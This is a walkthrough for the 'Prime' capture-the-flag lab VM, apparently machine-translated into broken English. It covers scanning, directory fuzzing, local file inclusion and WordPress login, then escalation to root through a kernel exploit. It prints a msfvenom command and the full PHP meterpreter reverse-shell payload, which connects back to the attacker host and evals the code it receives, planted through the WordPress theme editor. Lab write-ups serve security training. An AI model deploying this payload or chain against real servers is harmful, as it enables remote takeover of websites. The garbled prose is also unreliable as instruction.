Prime_ Series range from detection to weight lifting

The shooting range starts up, that's it Do is NET Your network card and I kali It's a network The Internet 192.168.34.0 Of

The title requirements are the same C But I don't know ip Address

So direct nmap scanning Target server ip Address and open services and ports

No technical content Can see ip by 192.168.34.130 It's opening up 22 80 Of 2 A service And the network container is apache

drib Here is the direct blasting catalogue

It can be seen that it is a wordpress The system of  

Second scan   -X Parameters [.txt] [.php] The meaning is added in the blasting suffix With .txt The end and .php ending

Here are three files image.php  index.php  and secret.txt

visit secret.txt  Tips can be used FUZZ that Just use wfuzz Try blasting directly

There are too many use -h Commands can filter

A variable called file Add variables to revisit

Make a difference Before for txt At the request of Meaning fuzz After the variable  location.txt Make a request for it So try

Here you can see There is an extra variable added as  secrettier360 （ Is this 360 The company sends foreign target planes Theory doesn't make sense ）

In the imge Use this variable You can access... Beyond your authority passwd file And there is a line prompt in the file as

Access this directory

  Get the key password  follow_the_ippsec

The password is wp The background password of open Just scanned wp The backstage address of

Here for wp Tools for Yes 2 individual The following is a screenshot of the effect （cmseek   wpscan）

  In the use of wpscan add to -e The module is visible when scanning users

So the login user name is victor The code is  follow_the_ippsec

Backstage Select template editing here You can find the right point

utilize msfenom Generate rebound Trojan horse

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.34.130 lport=4444 -f raw -o shell2.php

  Copy the generated code Be careful not to /* Copy the beginning

<?php /**/ error_reporting(0); $ip = '192.168.34.130'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();   

Put it in wp Backstage and wait for access to execute Trojan

  The file location is

  function msf Set up the monitoring module

Start listening  

Rebound success Container permissions are www-data Low authority   os yes 4.15 Wubantu

use msf Find the corresponding EXP Hit it

By searching So this POC Conform to the current environment

 45010.c 

. c Documents need to be used gcc Compilation of So locate this file Copy it compile

  Put this cain Drop it on the target server

Weighted lifting right

  This shooting range can only be hit once   Use this poc Just pull the brake The kernel overflows   It's not welcome here Post a picture of the previous operation No problem